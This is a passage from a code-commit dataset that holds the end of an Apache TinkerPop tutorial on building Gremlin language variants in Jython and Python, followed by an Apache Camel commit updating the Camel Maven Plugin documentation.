sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-core-x.y.z.jar\")\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-driver-x.y.z.jar\")\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-shaded-x.y.z.jar\")\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/ext\/tinkergraph-gremlin\/lib\/tinkergraph-gremlin-x.y.z.jar\")\n# import Java classes\n>>> from org.apache.tinkerpop.gremlin.tinkergraph.structure import TinkerFactory\n>>> from org.apache.tinkerpop.gremlin.process.traversal.dsl.graph import __\n>>> from org.apache.tinkerpop.gremlin.process.traversal import *\n>>> from org.apache.tinkerpop.gremlin.structure import *\n# create the toy \"modern\" graph and spawn a GraphTraversalSource\n>>> graph = TinkerFactory.createModern()\n>>> g = graph.traversal()\n# The Jython shell does not automatically iterate Iterators like the GremlinConsole\n>>> g.V().hasLabel(\"person\").out(\"knows\").out(\"created\")\n[GraphStep(vertex,[]), HasStep([~label.eq(person)]), VertexStep(OUT,[knows],vertex), VertexStep(OUT,[created],vertex)]\n# toList() will do the iteration and return the results as a list\n>>> g.V().hasLabel(\"person\").out(\"knows\").out(\"created\").toList()\n[v[5], v[3]]\n>>> g.V().repeat(__.out()).times(2).values(\"name\").toList()\n[ripple, lop]\n# results can be interacted with using Python\n>>> g.V().repeat(__.out()).times(2).values(\"name\").toList()[0]\nu'ripple'\n>>> g.V().repeat(__.out()).times(2).values(\"name\").toList()[0][0:3].upper()\nu'RIP'\n>>>\n----\n\nMost every JSR-223 `ScriptEngine` language will allow the developer to immediately interact with `GraphTraversal`.\nThe benefit of this model is that nearly every major programming language has a respective `ScriptEngine`:\nlink:https:\/\/en.wikipedia.org\/wiki\/Nashorn_(JavaScript_engine)[JavaScript], link:http:\/\/groovy-lang.org\/[Groovy],\nlink:http:\/\/www.scala-lang.org\/[Scala], Lisp (link:https:\/\/clojure.org\/[Clojure]), link:http:\/\/jruby.org\/[Ruby], etc. A\nlist of implementations is provided link:https:\/\/en.wikipedia.org\/wiki\/List_of_JVM_languages[here].\n\n==== Traversal Wrappers\n\nWhile it is possible to simply interact with Java classes in a `ScriptEngine` implementation, such Gremlin language variants\nwill not leverage the unique features of the host language. It is for this reason that JVM-based language variants such as\nlink:https:\/\/github.com\/mpollmeier\/gremlin-scala[Gremlin-Scala] were developed. Scala provides many syntax niceties not\navailable in Java. To leverage these niceties, Gremlin-Scala \"wraps\" `GraphTraversal` in order to provide Scala-idiomatic extensions.\nAnother example is Apache TinkerPop's Gremlin-Groovy which does the same via the\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#sugar-plugin[Sugar plugin], but uses\nlink:http:\/\/groovy-lang.org\/metaprogramming.html[meta-programming] instead of object wrapping, where \"behind the scenes,\"\nGroovy meta-programming is doing object wrapping.\n\nThe Jython example below uses Python meta-programming to add functionality to `GraphTraversal`.\nIn particular, the `__getitem__` and `__getattr__` \"magic methods\" are leveraged.\n\n[source,python]\n----\ndef getitem_bypass(self, index):\n if isinstance(index,int):\n return self.range(index,index+1)\n elif isinstance(index,slice):\n return self.range(index.start,index.stop)\n else:\n return TypeError('Index must be int or slice')\");\nGraphTraversal.__getitem__ = getitem_bypass\nGraphTraversal.__getattr__ = lambda self, key: self.values(key)\n----\n\nThe two methods `__getitem__` and `__getattr__` support Python _slicing_ and _object attribute interception_, respectively.\nIn this way, the host language is able to use its native constructs in a meaningful way within a Gremlin traversal.\n\nIMPORTANT: Gremlin-Java serves as the standard\/default representation of the Gremlin traversal language. Any Gremlin\nlanguage variant **must** provide all the same functionality (methods) as `GraphTraversal`, but **can** extend it\nwith host language specific constructs. This means that the extensions **must** compile to `GraphTraversal`-specific\nsteps. A Gremlin language variant **should not** add steps\/methods that do not exist in `GraphTraversal`. If an extension\nis desired, the language variant designer should submit a proposal to link:http:\/\/tinkerpop.apache.org[Apache TinkerPop]\nto have the extension added to a future release of Gremlin.\n\n[[using-python-and-remoteconnection]]\n=== Using Python and RemoteConnection\n\nimage:python-logo.png[width=125,float=left,link=\"https:\/\/www.python.org\/\"] The JVM is a powerful piece of technology that has, over the years,\nbecome a meeting ground for developers from numerous language communities. However, not all applications will use the JVM.\nGiven that Apache TinkerPop is a Java-framework, there must be a way for two different virtual machines to communicate\ntraversals and their results. This section presents the second Gremlin language variant implementation model which does just that.\n\nNOTE: Apache TinkerPop is a JVM-based graph computing framework. Most graph databases and processors today are built\non the JVM. This makes it easy for these graph system providers to implement Apache TinkerPop. However, TinkerPop is more\nthan its graph API and tools -- it is also the Gremlin traversal machine and language. While Apache's Gremlin traversal\nmachine was written for the JVM, its constructs are simple and can\/should be ported to other VMs for those graph systems\nthat are not JVM-based. A theoretical review of the concepts behind the Gremlin traversal machine is provided in\nlink:http:\/\/arxiv.org\/abs\/1508.03843[this article].\n\nThis section's Gremlin language variant design model does not leverage the JVM directly. Instead, it constructs a `Bytecode`\nrepresentation of a `Traversal` that will ultimately be evaluated by `RemoteConnection` (e.g. GremlinServer).\nIt is up to the language variant designer to choose a _language driver_ to use for submitting the generated bytecode and\ncoercing its results. The language driver is the means by which, for this example, the CPython\nVM communicates with the JVM.\n\n[source,bash]\n----\n# sudo easy_install pip\n$ pip install gremlinpython\n----\n\nThe Groovy source code below uses Java reflection to generate a Python class that is in 1-to-1 correspondence with\nGremlin-Java.\n\n[source,groovy]\n----\nclass GraphTraversalSourceGenerator {\n\n public static void create(final String graphTraversalSourceFile) {\n\n final StringBuilder pythonClass = new StringBuilder()\n\n pythonClass.append(\"from .traversal import Traversal\\n\")\n pythonClass.append(\"from .traversal import TraversalStrategies\\n\")\n pythonClass.append(\"from .traversal import Bytecode\\n\")\n pythonClass.append(\"from ..driver.remote_connection import RemoteStrategy\\n\")\n pythonClass.append(\"from .. import statics\\n\\n\")\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\/\/ GraphTraversalSource \/\/\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n pythonClass.append(\n \"\"\"class GraphTraversalSource(object):\n def __init__(self, graph, traversal_strategies, bytecode=None):\n self.graph = graph\n self.traversal_strategies = traversal_strategies\n if bytecode is None:\n bytecode = Bytecode()\n self.bytecode = bytecode\n def __repr__(self):\n return \"graphtraversalsource[\" + str(self.graph) + \"]\"\n\"\"\")\n GraphTraversalSource.getMethods(). \/\/ SOURCE STEPS\n findAll { GraphTraversalSource.class.equals(it.returnType) }.\n findAll {\n !it.name.equals(\"clone\") &&\n !it.name.equals(TraversalSource.Symbols.withRemote)\n }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" def ${method}(self, *args):\n source = GraphTraversalSource(self.graph, TraversalStrategies(self.traversal_strategies), Bytecode(self.bytecode))\n source.bytecode.add_source(\"${SymbolHelper.toJava(method)}\", *args)\n return source\n\"\"\")\n }\n pythonClass.append(\n \"\"\" def withRemote(self, remote_connection):\n source = GraphTraversalSource(self.graph, TraversalStrategies(self.traversal_strategies), Bytecode(self.bytecode))\n source.traversal_strategies.add_strategies([RemoteStrategy(remote_connection)])\n return source\n\"\"\")\n GraphTraversalSource.getMethods(). \/\/ SPAWN STEPS\n findAll { GraphTraversal.class.equals(it.returnType) }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" def ${method}(self, *args):\n traversal = GraphTraversal(self.graph, self.traversal_strategies, Bytecode(self.bytecode))\n traversal.bytecode.add_step(\"${SymbolHelper.toJava(method)}\", *args)\n return traversal\n\"\"\")\n }\n pythonClass.append(\"\\n\\n\")\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\/\/ GraphTraversal \/\/\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n pythonClass.append(\n \"\"\"class GraphTraversal(Traversal):\n def __init__(self, graph, traversal_strategies, bytecode):\n Traversal.__init__(self, graph, traversal_strategies, bytecode)\n def __getitem__(self, index):\n if isinstance(index, int):\n return self.range(index, index + 1)\n elif isinstance(index, slice):\n return self.range(index.start, index.stop)\n else:\n raise TypeError(\"Index must be int or slice\")\n def __getattr__(self, key):\n return self.values(key)\n\"\"\")\n GraphTraversal.getMethods().\n findAll { GraphTraversal.class.equals(it.returnType) }.\n findAll { !it.name.equals(\"clone\") }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" def ${method}(self, *args):\n self.bytecode.add_step(\"${SymbolHelper.toJava(method)}\", *args)\n return self\n\"\"\")\n };\n pythonClass.append(\"\\n\\n\")\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\/\/ AnonymousTraversal \/\/\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n pythonClass.append(\"class __(object):\\n\");\n __.class.getMethods().\n findAll { GraphTraversal.class.equals(it.returnType) }.\n findAll { Modifier.isStatic(it.getModifiers()) }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" @staticmethod\n def ${method}(*args):\n return GraphTraversal(None, None, Bytecode()).${method}(*args)\n\"\"\")\n };\n pythonClass.append(\"\\n\\n\")\n \/\/ add to gremlin.python.statics\n __.class.getMethods().\n findAll { GraphTraversal.class.equals(it.returnType) }.\n findAll { Modifier.isStatic(it.getModifiers()) }.\n findAll { !it.name.equals(\"__\") }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach {\n pythonClass.append(\"def ${it}(*args):\\n\").append(\" return __.${it}(*args)\\n\\n\")\n pythonClass.append(\"statics.add_static('${it}', ${it})\\n\\n\")\n }\n pythonClass.append(\"\\n\\n\")\n\n\/\/ save to a python file\n final File file = new File(graphTraversalSourceFile);\n file.delete()\n pythonClass.eachLine { file.append(it + \"\\n\") }\n }\n}\n----\n\nWhen the above Groovy script is evaluated (e.g. in GremlinConsole), **Gremlin-Python** is born. The generated Python\nfile is available at link:https:\/\/github.com\/apache\/tinkerpop\/blob\/x.y.z\/gremlin-python\/src\/main\/jython\/gremlin_python\/process\/graph_traversal.py[graph_traversal.py].\nIt is important to note that there is a bit more to Gremlin-Python in that there also exists Python implementations of `TraversalStrategies`, `Traversal`, `Bytecode`, etc.\nPlease review the full implementation of Gremlin-Python link:https:\/\/github.com\/apache\/tinkerpop\/tree\/x.y.z\/gremlin-python\/src\/main\/jython\/gremlin_python[here].\n\nNOTE: In practice, TinkerPop uses the Groovy's `GStringTemplateEngine` to help with the code generation task described\nabove and automates that generation as part of the standard build with Maven using the `gmavenplus-plugin`. See the\n`gremlin-python` link:https:\/\/github.com\/apache\/tinkerpop\/blob\/x.y.z\/gremlin-python\/pom.xml[pom.xml] for more details.\n\nOf particular importance is Gremlin-Python's implementation of `Bytecode`.\n\n[source,python]\n----\nclass Bytecode(object):\n def __init__(self, bytecode=None):\n self.source_instructions = []\n self.step_instructions = []\n self.bindings = {}\n if bytecode is not None:\n self.source_instructions = list(bytecode.source_instructions)\n self.step_instructions = list(bytecode.step_instructions)\n\n def add_source(self, source_name, *args):\n newArgs = ()\n for arg in args:\n newArgs = newArgs + (self.__convertArgument(arg),)\n self.source_instructions.append((source_name, newArgs))\n return\n\n def add_step(self, step_name, *args):\n newArgs = ()\n for arg in args:\n newArgs = newArgs + (self.__convertArgument(arg),)\n self.step_instructions.append((step_name, newArgs))\n return\n\n def __convertArgument(self,arg):\n if isinstance(arg, Traversal):\n self.bindings.update(arg.bytecode.bindings)\n return arg.bytecode\n elif isinstance(arg, tuple) and 2 == len(arg) and isinstance(arg[0], str):\n self.bindings[arg[0]] = arg[1]\n return Binding(arg[0],arg[1])\n else:\n return arg\n----\n\nAs `GraphTraversalSource` and `GraphTraversal` are manipulated, the step-by-step instructions are written to `Bytecode`.\nThis bytecode is simply a list of lists. For instance, `g.V(1).repeat(out('knows').hasLabel('person')).times(2).name` has\nthe `Bytecode` form:\n\n[source,json]\n----\n[\n [\"V\", [1]],\n [\"repeat\", [[\n [\"out\", [\"knows\"]]\n [\"hasLabel\", [\"person\"]]]]]\n [\"times\", [2]]\n [\"values\", [\"name\"]]\n]\n----\n\nThis nested list representation is ultimately converted by the language variant into link:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#graphson-reader-writer[GraphSON]\nfor serialization to a `RemoteConnection` such as GremlinServer.\n\n[source,bash]\n----\n$ bin\/gremlin-server.sh install org.apache.tinkerpop gremlin-python x.y.z\n$ bin\/gremlin-server.sh conf\/gremlin-server-modern-py.yaml\n[INFO] GremlinServer -\n \\,,,\/\n (o o)\n---oOOo-(3)-oOOo---\n\n[INFO] GremlinServer - Configuring Gremlin Server from conf\/gremlin-server-modern-py.yaml\n[INFO] MetricManager - Configured Metrics Slf4jReporter configured with interval=180000ms and loggerName=org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics\n[INFO] GraphManager - Graph [graph] was successfully configured via [conf\/tinkergraph-empty.properties].\n[INFO] ServerGremlinExecutor - Initialized Gremlin thread pool. Threads in pool named with pattern gremlin-*\n[INFO] ServerGremlinExecutor - Initialized GremlinExecutor and configured ScriptEngines.\n[INFO] Logger - 56 attributes loaded from 90 stream(s) in 21ms, 56 saved, 1150 ignored: [\"Ant-Version\", \"Archiver-Version\", \"Bnd-LastModified\", \"Boot-Class-Path\", \"Build-Jdk\", \"Build-Version\", \"Built-By\", \"Bundle-Activator\", \"Bundle-BuddyPolicy\", \"Bundle-ClassPath\", \"Bundle-Description\", \"Bundle-DocURL\", \"Bundle-License\", \"Bundle-ManifestVersion\", \"Bundle-Name\", \"Bundle-RequiredExecutionEnvironment\", \"Bundle-SymbolicName\", \"Bundle-Vendor\", \"Bundle-Version\", \"Can-Redefine-Classes\", \"Created-By\", \"DynamicImport-Package\", \"Eclipse-BuddyPolicy\", \"Export-Package\", \"Extension-Name\", \"Extension-name\", \"Fragment-Host\", \"Gremlin-Plugin-Dependencies\", \"Ignore-Package\", \"Implementation-Build\", \"Implementation-Title\", \"Implementation-URL\", \"Implementation-Vendor\", \"Implementation-Vendor-Id\", \"Implementation-Version\", \"Import-Package\", \"Include-Resource\", \"JCabi-Build\", \"JCabi-Date\", \"JCabi-Version\", \"Main-Class\", \"Main-class\", \"Manifest-Version\", \"Originally-Created-By\", \"Package\", \"Private-Package\", \"Require-Capability\", \"Specification-Title\", \"Specification-Vendor\", \"Specification-Version\", \"Tool\", \"Url\", \"X-Compile-Source-JDK\", \"X-Compile-Target-JDK\", \"hash\", \"version\"]\n[INFO] ServerGremlinExecutor - A GraphTraversalSource is now bound to [g] with graphtraversalsource[tinkergraph[vertices:0 edges:0], standard]\n[INFO] OpLoader - Adding the standard OpProcessor.\n[INFO] OpLoader - Adding the session OpProcessor.\n[INFO] OpLoader - Adding the traversal OpProcessor.\n[INFO] TraversalOpProcessor - Initialized cache for TraversalOpProcessor with size 1000 and expiration time of 600000 ms\n[INFO] GremlinServer - Executing start up LifeCycleHook\n[INFO] Logger$info - Executed once at startup of Gremlin Server.\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v3.0+gryo with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v3.0+gryo-stringd with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v3.0+json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV3d0\n[INFO] AbstractChannelizer - Configured application\/json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV3d0\n[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 4 and boss thread pool of 1.\n[INFO] GremlinServer$1 - Channel started at port 8182.\n----\n\nWithin the CPython console, it is possible to evaluate the following.\n\n[source,python]\n----\nPython 2.7.2 (default, Oct 11 2012, 20:14:37)\n[GCC 4.2.1 Compatible Apple Clang 4.0 (tags\/Apple\/clang-418.0.60)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> from gremlin_python import statics\n>>> from gremlin_python.structure.graph import Graph\n>>> from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection\n# loading statics enables __.out() to be out() and P.gt() to be gt()\n>>> statics.load_statics(globals())\n>>> graph = Graph()\n>>> g = graph.traversal().withRemote(DriverRemoteConnection('ws:\/\/localhost:8182\/gremlin','g'))\n# nested traversal with Python slicing and attribute interception extensions\n>>> g.V().hasLabel(\"person\").repeat(both()).times(2).name[0:2].toList()\n[u'marko', u'marko']\n>>> g = g.withComputer()\n>>> g.V().hasLabel(\"person\").repeat(both()).times(2).name[0:2].toList()\n[u'peter', u'peter']\n# a complex, nested multi-line traversal\n>>> g.V().match( \\\n... as_(\"a\").out(\"created\").as_(\"b\"), \\\n... as_(\"b\").in_(\"created\").as_(\"c\"), \\\n... as_(\"a\").out(\"knows\").as_(\"c\")). \\\n... select(\"c\"). \\\n... union(in_(\"knows\"),out(\"created\")). \\\n... name.toList()\n[u'ripple', u'marko', u'lop']\n>>>\n----\n\nIMPORTANT: Learn more about Apache TinkerPop's distribution of Gremlin-Python link:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#gremlin-python[here].\n\n[[gremlin-language-variant-conventions]]\n== Gremlin Language Variant Conventions\n\nEvery programming language is different and a Gremlin language variant must ride the fine line between leveraging the\nconventions of the host language and ensuring consistency with Gremlin-Java. A collection of conventions for navigating\nthis dual-language bridge are provided.\n\n* If camelCase is not an accepted method naming convention in the host language, then the host language's convention can be used instead. For instance, in a Gremlin-Ruby implementation, `outE(\"created\")` may be `out_e(\"created\")`.\n* If Gremlin-Java step names conflict with the host language's reserved words, then a consistent amelioration should be used. For instance, in Python `as` is a reserved word, thus, Gremlin-Python uses `as_`.\n* If the host language does not use dot-notion for method chaining, then its method chaining convention should be used instead of going the route of operator overloading. For instance, a Gremlin-PHP implementation should do `$g->V()->out()`.\n* If a programming language does not support method overloading, then varargs and type introspection should be used. In Gremlin-Python, `*args` does just that.\n\n== Conclusion\n\nGremlin is a simple language because it uses two fundamental programming language constructs: *function composition*\nand *function nesting*. Because of this foundation, it is relatively easy to implement Gremlin in any modern programming\nlanguage. Two ways of doing this for the Python language were presented in this tutorial. One using Jython (on the JVM) and one using Python\n(on CPython). It is strongly recommended that language variant designers leverage (especially when not on the JVM)\nthe reflection-based source code generation technique presented. This method ensures that the language\nvariant is always in sync with the corresponding Apache TinkerPop Gremlin-Java release version. Moreover, it reduces\nthe chance of missing methods or creating poorly implemented methods. While Gremlin is simple, there are nearly 200\nsteps in `GraphTraversal`. As such, mechanical means of host language embedding are strongly advised.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7e9925e60ec3f1295e0f260118ca7aa6224936bf","subject":"Regen for commit 821adb8cc121dfdace94f20bf36346dbfb51b6bb (#7895)","message":"Regen for commit 821adb8cc121dfdace94f20bf36346dbfb51b6bb (#7895)\n\nSigned-off-by: GitHub <1505422b2465e9a84f6fdfaa161078890c593f06@github.com>\r\n\r\nCo-authored-by: davsclaus <3cabd045dd8d3287ff6fd2a2e637a44e01b67029@users.noreply.github.com>","repos":"cunningt\/camel,cunningt\/camel,tadayosi\/camel,christophd\/camel,cunningt\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,apache\/camel,christophd\/camel,cunningt\/camel,cunningt\/camel,apache\/camel,tadayosi\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,tadayosi\/camel,tadayosi\/camel,apache\/camel,apache\/camel,christophd\/camel,christophd\/camel,apache\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-maven-plugin.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-maven-plugin.adoc","new_contents":"= Camel Maven Plugin\n\nThe Camel Maven Plugin supports the following goals\n\n - camel:run - To run your Camel application\n - camel:dev - To run your Camel application in developer mode\n - camel:debug - To run your Camel application in debug mode\n - camel:prepare-fatjar - To prepare your Camel application for being packaged as a fat-jar (such as by maven-assembly-plugin)\n\n== camel:run\n\nThe `camel:run` goal of the Camel Maven Plugin is used to run your Camel Spring configurations in a forked JVM from Maven.\nA good example application to get you started is the Spring Example.\n\n----\ncd examples\/camel-example-spring\nmvn camel:run\n----\n\nThis makes it very easy to spin up and test your routing rules without having to write a main(...) method;\nit also lets you create multiple jars to host different sets of routing rules and easily test them independently.\n\nHow this works is that the plugin will compile the source code in the maven project,\nthen boot up a Spring ApplicationContext using the XML configuration files on the classpath at `META-INF\/spring\/*.xml`\n\nIf you want to boot up your Camel routes a little faster, you could try the `camel:embedded` instead.\n\n=== Options\n\nThe maven plugin *run* goal supports the following options which can be configured from the command line (use `-D` syntax), or defined in the `pom.xml` file in the `<configuration>` tag.\n\n|===\n| Parameter | Default Value | Description\n| duration | -1 | Sets the time duration (seconds) that the application will run for before terminating. A value <= 0 will run forever.\n| durationIdle | -1 | Sets the idle time duration (seconds) duration that the application can be idle before terminating. A value <= 0 will run forever.\n| durationMaxMessages | -1 | Sets the duration of maximum number of messages that the application will process before terminating.\n| logClasspath | false | Whether to log the classpath when starting\n| loggingLevel | OFF | Whether to use built-in console logging (uses log4j), which does not require to add any logging dependency to your project. However, the logging is fixed to log to the console, with a color style that is similar to Spring Boot. You can change the root logging level to: FATAL, ERROR, WARN, INFO, DEBUG, TRACE, OFF\n|===\n\n\n=== Running OSGi Blueprint\n\nUse the `camel-karaf-maven-plugin` which is intended for Apache Camel on Karaf\/OSGi.\n\n=== Running CDI\n\nThe `camel:run` plugin also supports running a CDI application\n\nThis allows you to boot up any CDI services you wish - whether they are Camel-related, or any other CDI enabled services.\nYou should add the CDI container of your choice (e.g. Weld or OpenWebBeans) to the dependencies of the camel-maven-plugin such as in this example.\n\nFrom the source of Camel you can run a CDI example via\n\n----\ncd examples\/camel-example-cdi\nmvn compile camel:run\n----\n\n=== Logging the classpath\n\nYou can configure whether the classpath should be logged when `camel:run` executes.\nYou can enable this in the configuration using:\n\n[source,xml]\n----\n<plugin>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-maven-plugin<\/artifactId>\n <configuration>\n <logClasspath>true<\/logClasspath>\n <\/configuration>\n<\/plugin>\n----\n\n=== Using built-in logging\n\nIf you want quickly to have logging to console, you can use the built-in logging by setting the logging level as shown:\n\n[source,xml]\n----\n<plugin>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-maven-plugin<\/artifactId>\n <configuration>\n <loggingLevel>INFO<\/loggingLevel>\n <\/configuration>\n<\/plugin>\n----\n\nThis runs the application with console logging, in color that is similar to Spring Boot logging.\nThis is default turned off, to use the configured logging system in the project.\n\nThe idea with the built-in logging is that you sometimes want to avoid messing with setting\nup logging, and just want a quick and easy log to console that looks good.\n\n\n== camel:dev\n\nThe `camel:dev` is an extension to `camel:run` to run the Camel application in developer mode.\nIn this mode, among others, Camel will use hot-reloading of DSL routes (xml, yaml and java) that are located from\nthe `src\/main\/resources` directory.\n\n=== Options\n\nThe maven plugin *dev* goal supports the following options which can be configured from the command line (use `-D` syntax), or defined in the `pom.xml` file in the `<configuration>` tag.\n\n|===\n| Parameter | Default Value | Description\n| routesDirectory | src\/main\/resources | To watch the directory for file changes which triggers a live reload of the Camel routes on-the-fly.\n| duration | -1 | Sets the time duration (seconds) that the application will run for before terminating. A value <= 0 will run forever.\n| durationIdle | -1 | Sets the idle time duration (seconds) duration that the application can be idle before terminating. A value <= 0 will run forever.\n| durationMaxMessages | -1 | Sets the duration of maximum number of messages that the application will process before terminating.\n| logClasspath | false | Whether to log the classpath when starting\n| loggingLevel | OFF | Whether to use built-in console logging (uses log4j), which does not require to add any logging dependency to your project. However, the logging is fixed to log to the console, with a color style that is similar to Spring Boot. You can change the root logging level to: FATAL, ERROR, WARN, INFO, DEBUG, TRACE, OFF\n|===\n\n== camel:debug\n\nThe `camel:debug` is an extension to `camel:dev` to run the Camel application in debug mode which allows to debug the Camel routes thanks to the Camel textual route debugger.\n\n=== Options\n\nThe maven plugin *debug* goal supports the following options which can be configured from the command line (use `-D` syntax), or defined in the `pom.xml` file in the `<configuration>` tag.\n\n|===\n| Parameter | Default Value | Description\n| suspend | true | Indicates whether the message processing done by Camel should be suspended as long as a debugger is not attached.\n|===\n\n== camel:prepare-fatjar\n\nThe `camel:prepare-fatjar` goal of the Camel Maven Plugin is used to prepare your Camel application\nfor being packaged as a _fat jar_. The goal scans the Maven dependencies to discover Camel JARs and\nextract if they have type converters, which gets merged together into a single _uber_ file stored\nin `target\/classes\/META-INF\/services\/org\/apache\/camel\/UberTypeConverterLoader`.\n\nThis _uber_ loader file contains all the combined type converters the Camel application uses at runtime.\nThey are merged together into this single file.\n\nThis is needed as otherwise the _fat jar_ maven plugins (such as maven-assembly-plugin, or maven-shade-plugin)\ncauses the `TypeConverterLoader` files to be overwritten in the assembled JAR which causes not all type converters\nto be loaded by Camel.\n\nThe `UberTypeConverterLoader` ensures they all type converters gets loaded as this file contains all the known\ntype converter files.\n\nTo use this goal, you can add the following to your Camel application `pom.xml` file:\n\n[source,xml]\n----\n <build>\n <plugins>\n <plugin>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-maven-plugin<\/artifactId>\n <version>${camel.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>prepare-fatjar<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n <\/build>\n----\n\nFor example to use this with the `maven-assembly-plugin` you can do as below.\nRemember to specify the class name of *your* main class where it says `com.foo.NameOfMainClass`:\n\n[source,xml]\n----\n <build>\n <plugins>\n <plugin>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-maven-plugin<\/artifactId>\n <version>${camel.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>prepare-fatjar<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n <plugin>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-assembly-plugin<\/artifactId>\n <configuration>\n <archive>\n <manifest>\n <mainClass>com.foo.NameOfMainClass<\/mainClass>\n <\/manifest>\n <\/archive>\n <\/configuration>\n <\/plugin>\n <\/plugins>\n <\/build>\n----\n","old_contents":"= Camel Maven Plugin\n\nThe Camel Maven Plugin supports the following goals\n\n - camel:run - To run your Camel application\n - camel:dev - To run your Camel application in developer mode\n - camel:prepare-fatjar - To prepare your Camel application for being packaged as a fat-jar (such as by maven-assembly-plugin)\n\n== camel:run\n\nThe `camel:run` goal of the Camel Maven Plugin is used to run your Camel Spring configurations in a forked JVM from Maven.\nA good example application to get you started is the Spring Example.\n\n----\ncd examples\/camel-example-spring\nmvn camel:run\n----\n\nThis makes it very easy to spin up and test your routing rules without having to write a main(...) method;\nit also lets you create multiple jars to host different sets of routing rules and easily test them independently.\n\nHow this works is that the plugin will compile the source code in the maven project,\nthen boot up a Spring ApplicationContext using the XML configuration files on the classpath at `META-INF\/spring\/*.xml`\n\nIf you want to boot up your Camel routes a little faster, you could try the `camel:embedded` instead.\n\n=== Options\n\nThe maven plugin *run* goal supports the following options which can be configured from the command line (use `-D` syntax), or defined in the `pom.xml` file in the `<configuration>` tag.\n\n|===\n| Parameter | Default Value | Description\n| duration | -1 | Sets the time duration (seconds) that the application will run for before terminating. A value <= 0 will run forever.\n| durationIdle | -1 | Sets the idle time duration (seconds) duration that the application can be idle before terminating. A value <= 0 will run forever.\n| durationMaxMessages | -1 | Sets the duration of maximum number of messages that the application will process before terminating.\n| logClasspath | false | Whether to log the classpath when starting\n| loggingLevel | OFF | Whether to use built-in console logging (uses log4j), which does not require to add any logging dependency to your project. However, the logging is fixed to log to the console, with a color style that is similar to Spring Boot. You can change the root logging level to: FATAL, ERROR, WARN, INFO, DEBUG, TRACE, OFF\n|===\n\n\n=== Running OSGi Blueprint\n\nUse the `camel-karaf-maven-plugin` which is intended for Apache Camel on Karaf\/OSGi.\n\n=== Running CDI\n\nThe `camel:run` plugin also supports running a CDI application\n\nThis allows you to boot up any CDI services you wish - whether they are Camel-related, or any other CDI enabled services.\nYou should add the CDI container of your choice (e.g. Weld or OpenWebBeans) to the dependencies of the camel-maven-plugin such as in this example.\n\nFrom the source of Camel you can run a CDI example via\n\n----\ncd examples\/camel-example-cdi\nmvn compile camel:run\n----\n\n=== Logging the classpath\n\nYou can configure whether the classpath should be logged when `camel:run` executes.\nYou can enable this in the configuration using:\n\n[source,xml]\n----\n<plugin>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-maven-plugin<\/artifactId>\n <configuration>\n <logClasspath>true<\/logClasspath>\n <\/configuration>\n<\/plugin>\n----\n\n=== Using built-in logging\n\nIf you want quickly to have logging to console, you can use the built-in logging by setting the logging level as shown:\n\n[source,xml]\n----\n<plugin>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-maven-plugin<\/artifactId>\n <configuration>\n <loggingLevel>INFO<\/loggingLevel>\n <\/configuration>\n<\/plugin>\n----\n\nThis runs the application with console logging, in color that is similar to Spring Boot logging.\nThis is default turned off, to use the configured logging system in the project.\n\nThe idea with the built-in logging is that you sometimes want to avoid messing with setting\nup logging, and just 